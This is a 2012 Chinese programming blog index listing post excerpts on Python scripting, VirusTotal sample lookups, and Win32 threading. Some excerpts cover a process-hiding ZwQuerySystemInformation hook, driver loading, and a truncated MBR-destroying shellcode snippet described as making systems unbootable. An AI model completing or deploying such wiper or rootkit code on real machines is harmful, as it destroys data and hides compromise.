- 博客(43)
- 资源 (12)
- 收藏
- 关注
RSS订阅原创 python-利用queue和threading实现多线程下载
主代码:#---------------------------------------------------- #download worker #---------------------------------------------------- queue_download = Queue.Queue(0) DOWNLOAD_WORKERS = 20
2012-05-30 17:59:05
4294
原创 python-封装得到virustotal扫描结果
import simplejsonimport urllibimport urllib2import os, sysimport loggingtry: import sqlite3except ImportError: sys.stderr.write("ERROR: Unable to locate Python SQLite3 module. " \
2012-05-30 17:53:06
1992
1
原创 python 解析xml文件
xml文件内容: sample xml thing ma xiaoju Springs Widgets, Inc. First I think widgets are greate.You should buy lots of them forom
2012-05-29 14:18:32
882
原创 python 写xml文件的操作
要生成的xml文件格式如下: sample xml thing ma xiaoju Springs Widgets, Inc. First I think widgets are greate.You should buy lots of them forom
2012-05-29 13:21:36
1205
原创 python-上传样本到virustotal,查询扫描信息
import simplejsonimport urllibimport urllib2import os MD5 = "5248f774d2ee0a10936d0b1dc89107f1"MD5 = "12fa5fb74201d9b6a14f63fbf9a81ff6" #do not have report on virustotal.com #####
2012-05-28 19:41:50
3282
3
原创 python-计算资源图标的crc值
关键在于解析资源信息,找到icon的数据,然后计算这些数据的crc#---------------------------------------------------------------------- def _get_iconcrc(self, file_path): """ Generates the crc32 hash of the ic
2012-05-25 19:47:40
1629
原创 python 求crc32的值
求CRC值 前面要import binasciibinascii.crc32(v) 求出了v的crc32值,这是一个long型,形如-1456387L,把这个值&0xffffffff得到的值形如48a213L的形式。。。然后把这个值用16进制表示出来 #---------------------------------------------------------
2012-05-25 19:45:45
6956
原创 得到文件 的ssdeep值
得到ssdeep值 要先import ssdeep在ubuntu上安装pyssdeep时 一直出错 后来发现apt-cache search "ssdeep"时把几个全apt-get install 上。。。问题依旧。。后来下载到pyssdeep的源文件 ,tar zxvf pyssdeep.tar.zip 然后 apt-get install python-dev 然后 pytho
2012-05-25 19:41:58
2437
原创 python 得到文件版本信息 公司名和产品名(2)
为什么还有二,因为一使用了win32api模块,而这个模块只在windows系统下有,对linux系统木有这个模块。。在linux下得到文件 版本信息是通过pefile模块解析文件 中的字符串得到的。。。代码:#---------------------------------------------------------------------- def _get_comp
2012-05-25 18:53:16
2174
原创 python 得到文件版本信息 公司名和产品名
python 得到文件版本信息 公司名和产品名 其他的信息都在返回的字典中代码:#---------------------------------------------------------------------- def _getCompanyNameAndProductName(self, file_path): """ Read al
2012-05-25 10:35:41
2171
原创 python-调用其他的python脚本
调用当前目录下的md5get.py脚本。import osimport loggingimport subprocesslog = logging.getLogger("Core.Analysis.Processing")INTERPRETER = "/usr/bin/python"if not os.path.exists(INTERPRETER):
2012-05-22 15:11:27
8005
原创 python-pycurl库的使用
从指定网址读取网页,主要是pycurl库的使用#########################################################################定义一个类class CallBack: """ for pycurl """ #------------------------
2012-05-22 14:06:08
1612
原创 python_getopt解析命令行输入参数的使用
import getoptimport sysconfig = { "input":"", "output":".", }#getopt三个选项,第一个一般为sys.argv[1:],第二个参数为短参数,如果参数后面必须跟值,须加:,第三个参数为长参数#是一个列表,opts, args = getopt.getopt(sys.argv[1:], 'hi:o:
2012-05-22 11:01:33
8655
1
原创 hook zwQuerySysteminformation 隐藏进程
代码:#include //#include typedef unsigned long DWORD;#pragma pack(1)typedef struct ServiceDescriptorEntry{ unsigned int *ServiceTableBase; unsigned int *ServiceCountTableBase; unsigned int Nu
2012-05-21 12:20:55
5253
2
翻译 DeviceIoCteatol的使用
应用程序:DWORD dwBytesReturned = 0; BYTE bytBuffer_1[512]; BYTE bytBuffer_2[512]; CHAR string[2048]; HANDLE hDevice, hDriver; BOOL bRet;bRet = DeviceIoControl(hDriver, IOCTL_WRITE, (LPVOID)bytBuff
2012-05-21 10:11:25
819
原创 破坏MBR的代码
破坏MBR的代码,只有破坏作用,使系统无法进入。。。来源于网上。。#include #include //shellcode随便写了点 能破坏MBR,无法进入系统unsigned char scode[]= "\xb8\x12\x00" "\xcd\x10\xbd" "\x18\x7c\xb9";DWORD writeMBR(){ DWORD dwBy
2012-05-20 19:41:04
3456
原创 处理射手网字幕,方便打印
处理射手网字幕,方便打印1. vim:g!/^[0-9]/m$ 将以数字开头的行放到开头。保存成1.txt2. 将1.txt复制到word中,把表示时间的行删除掉,把^p^p(两个回车符的地方)替换成^p,把和全部替换成空3. 加上页码信息,调下页面边距,分下栏。。print吧
2012-05-20 15:13:49
1501
原创 ZwQuerySystemInformation 查看系统进程信息
ZwQuerySystemInformation 查看系统进程信息#include typedef enum _SYSTEM_INFORMATION_CLASS { SystemBasicInformation, SystemProcessorInformation, SystemPerformanceInformation, SystemTimeOfDayInform
2012-05-19 20:24:23
10072
2
原创 zwSetSystemInformation加载驱动
zwSetSystemInformation函数是个未公开的函数,调用38号会加载驱动,对应的第二个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体,第三个参数为SYSTEM_LOAD_AND_CALL_IMAGE结构体的长度..#include #include #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >
2012-05-19 17:12:03
4522
原创 ring3读取MBR
DWORD dwBytesReturned = 0; BYTE bytBuffer_1[512]; BYTE bytBuffer_2[512]; CHAR string[2048]; HANDLE hDevice, hDriver; BOOL bRet; hDevice = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_READ, FILE_
2012-05-18 15:03:36
1352
原创 ring3与ring0的通信
ring0程序:#include #define DEVICE_NAME L"\\Device\\KillHDDGMon"#define LINK_NAME L"\\DosDevices\\KillHDDGMon"#define IOCTL_WRITE CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800,METHOD_BUFFERED, FILE_ANY_ACC
2012-05-18 14:45:05
1914
转载 ring0级暴力搜索内存检测系统隐藏进程(或Rootkit)
#include//EPROCESS结构大小,我的系统是XP SP3,所以0x260,不过经过测试,这里设置成比实际EPROCESS小也是没问题的#define EPROCESS_SIZE 0x260 #define PEB_OFFSET 0x1B0 //PEB偏移,下面就不注释了#define FILE_NAME_OFFSET
2012-05-18 09:43:32
2079
原创 115网盘自动下载
115网盘自动下载其中的1.txt,是网页http://bbs.pediy.com/showthread.php?t=144788另存为1.txt通过每3秒钟复制一个下载链接到粘贴板,复制时会自动调用115客户端下载,每下载10个文件会手工输入一个字符,防止一下下载太多,卡死机器import re, os, timeimport webbrowserimport urllib
2012-05-17 19:51:08
2544
原创 python打开网页和暂停
import webbrowserimport os webbrowser.open_new_tab( webAddress)os.system("pause") //运行windows的pause 命令,等待用户输入 i = 0 while i<100: if downloadUrlList == None: break
2012-05-17 19:28:28
1522
原创 解析网页源代码中的115网盘链接
python解析网页源代码中的115网盘链接其中的1.txt,是网页http://bbs.pediy.com/showthread.php?t=144788另存为1.txtimport re if __name__ == "__main__": fp = open("c:\\1.txt") https = re.compile(r"(http
2012-05-17 17:44:16
6255
原创 python网络编程——读取网站根目录
python网络编程基本例子import socket, sysport = 70host = "quux.org"filename = "//"s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((host, port))s.sendall(filename+"\r\n")while(1):
2012-05-16 11:23:19
2241
原创 CNoTrackObject类 和new delete操作符的重载
没有跟踪信息,没有调试信息,没有大小信息的简单的数据内存 重载了new和delete操作符头信息:class CNoTrackObject{public: //在此出过错,没有加public 默认为类的私有变量,MyThreadData继承这个类后也无法访问成员变量 void* operator new(size_t nSize); void operator delete
2012-05-14 20:49:19
1650
原创 模板类的使用
接上节,模板类的使用//#include "StdAfx.h#ifndef __AFXTLS_H__#define __AFXTLS_H__#include class CSimpleList{public: CSimpleList(int nNextOffset=0); void Construct(int nNextOffset); //接口 BOOL IsEmpty(
2012-05-14 20:36:10
864
原创 CSimpleList的实现与测试
简单列表类的实现_AFXTLS.CPP文件//#include "StdAfx.h#include #include #include "_AFXTLS_.H"struct MyThreadData{ MyThreadData* pNext; int nShortData;};void CSimpleList::AddHead(void *p){ *GetNextP
2012-05-14 09:39:00
1418
原创 TLS线程局部存储的使用
TLS线程局部存储的使用// useTLS.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include //声明VOID InitStartTime();DWORD GetUserTime();//TLS索引,作全局变量 DWORD g_dwTlsIndex;VOID InitStartTime(){
2012-05-11 16:38:12
747
1
原创 Semaphore内核对象的使用
Semaphore内核对象的使用// Semaphore.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include HANDLE g_hSemaphore;DWORD g_nConut1 = 0;DWORD g_nConut2 = 0;unsigned __stdcall ThreadProc1( void* p
2012-05-11 13:12:14
1064
原创 设置事件通知工作线程工作
主线程通过将事件状态设置为“受信”来通知工作线程工作// eventDemo.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include HANDLE g_event;UINT __stdcall ThreadProc(LPVOID){ ::WaitForSingleObject(g_event, INFINITE)
2012-05-11 11:47:09
877
原创 使用CriticalSection进行线程同步
使用CriticalSection进行线程同步,在上个例子的基础上增加了四行代码,使用了四个函数:EnterCriticalSection::DeleteCriticalSection::EnterCriticalSection::LeaveCriticalSection此时,打印出来的数字就相等了……#include "stdafx.h"#include DWORD g_c
2012-05-11 10:41:43
923
原创 为什么要线程同步的例子
设置全局变量g_bContinue,在主线程中设置全局变量g_bContinue,工作线程检测该全局变量,实现主线程控制工作线程的目的……打印出的g_cnt1与g_cnt2的数值不同,是因为线程调试时时间片的切换……// countError.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include DWORD g_cnt1;DWOR
2012-05-11 10:35:56
1209
原创 线程优先级SetThreadPriority的使用
SetThreadPriority的使用// ThreadPriority.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include DWORD WINAPI ThreadProcIdle(LPVOID lpParameter){ for (int i=0;i<20;i++) { printf("I'm in thread IDL
2012-05-11 10:25:27
15646
原创 开启线程CreatThread函数的使用,主线程与工作线程的交互
开启线程CreatThread函数的使用,主线程与工作线程的交互//线程函数DWORD WINAPI ThreadProc(LPVOID lpParameter){ for (int i=0;i<20;i++) { printf("I'm in thread,count=%d\n",i); } return 0;}int _tmain(int argc, _TCHAR* arg
2012-05-11 10:16:11
1326
原创 内存查找
windows程序设计中的内存查找主程序代码:// MemRepair.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include BOOL FindFirst(DWORD dwValue);BOOL FindNext(DWORD dwValue);HANDLE g_hProcess;DWORD g_arList[1024];DW
2012-05-10 21:08:29
991
原创 TerminateProess结束进程
BOOL TerminateProcessFromId(DWORD pid){ HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE,pid); if (hProcess == NULL) { printf("openprocess failed..."); return FALSE; } BOOL bRet =
2012-05-10 19:53:32
800
原创 CreateToolhelp32Snapshot获取系统进程
// GetWinProcess.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include int _tmain(int argc, _TCHAR* argv[]){ HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (h
2012-05-10 19:42:37
1919
1
原创 查壳程序代码
PEID基于特征码的,用python只需要两行代码,用VC实现用了这么多代码……。python中只要引入pefile模块,第一句代码指定数据库文件,第二句代码返回结果..具体看pefile官方介绍吧下面是C的代码...void CMyPeidDlg::OnBnClickedBtnOpen(){ // 获取当前工作路径 CString strAppName;//当前
2012-05-10 13:33:46
1251
EarthWorm_20180630版本.tgz
2020-06-19
多级线程注入穿墙技术
2012-05-10
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人